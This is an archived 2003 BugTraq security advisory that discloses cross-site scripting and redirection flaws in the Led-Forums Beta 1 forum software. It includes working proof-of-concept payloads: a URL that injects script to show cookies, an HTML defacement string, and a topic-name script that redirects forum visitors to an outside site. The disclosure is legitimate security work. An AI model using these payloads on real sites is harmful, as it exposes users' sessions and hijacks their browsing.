BugTraq
Multiple Vulnerabilities in Led-Forums Oct 30 2003 04:04PM
ProXy - (proxy excluded org)


Product: Led-Forums

Versions: Beta 1

Vulnerability: XSS- and redirection-Bug

Date: October 30, 2003

Discovered by: ProXy <proxy (at) excluded (dot) org [email concealed]>

1. - XSS-Bug

The Welcome-Message of the Led-Forums software could be changed by everybody.

Normal Text, HTML and Javascript it's all allowed! :)

eg:

http://host/~path/index.php?top_message=<script>alert(document.coo
kie)</script>

http://host/~path/index.php?top_message=<h1>OWNED?%20*g*</h1>

--

2. - Redirection-Bug

HTML-tags are allowed in topic-names as well as Javascript.

So if anybody insert the following JS-code in the topic-field of a new thread

the complete forum-category would be redirected to the adress the attacker indicates.

<script>window.location='http://www.excluded.org'</script>

- ProXy

- http://www.excluded.org

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus